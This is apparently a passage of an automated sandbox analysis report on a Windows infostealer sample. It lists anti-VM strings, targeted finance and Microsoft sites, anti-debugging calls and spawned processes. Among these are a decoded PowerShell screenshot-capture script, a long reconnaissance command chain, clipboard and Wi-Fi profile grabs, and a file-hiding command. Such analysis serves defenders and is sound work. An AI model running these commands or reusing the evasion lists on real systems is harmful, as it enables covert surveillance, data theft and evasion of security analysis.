            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup user ServicewbuserWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmQ$k
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwareuser.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe", # VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmusrvc.exe"P
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: elif b"vmware" in stdout2.lower():
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu0{
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441219336.0000018B472C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437747781.0000018B472BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: [1VMware0g
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: net1.exe, 0000003B.00000002.2232321509.0000010E3AB98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Administrators
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray.exe0l
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat ServicevmicheartbeatHyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServF/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: ROUTE.EXE, 00000045.00000002.2254301390.0000019424DC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vboxtray.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b'VMware'
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice.exepk
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice.exep
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 'qemu'
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc.exe0o
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwarepy
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b'VMware'g
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe"pm
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447553924.0000018B4A1C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: ARP.EXE, 00000046.00000002.2256312580.0000015ABB729000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmusrvc.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "qemu-ga.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmacthlp.exe", # VMware
            Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D14241 2_2_00007FFD93D14241
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D1572C 2_2_00007FFD93D1572C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FFD94064460
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B83480 GetProcessHeap, 0_2_00007FF7B2B83480
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXE | Process token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXE | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6D30C SetUnhandledExceptionFilter, 0_2_00007FF7B2B6D30C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7B2B6C8A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B7A614
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FF7B2B6D30C SetUnhandledExceptionFilter, 2_2_00007FF7B2B6D30C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF7B2B6C8A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF7B2B7A614
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93BF3068 IsProcessorFeaturePresent,00007FFDA54619A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA54619A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FFD93BF3068
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D15A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FFD93D15A1F

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command removed]"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command removed]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B89570 cpuid 0_2_00007FF7B2B89570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip VolumeInformationJump to behavior
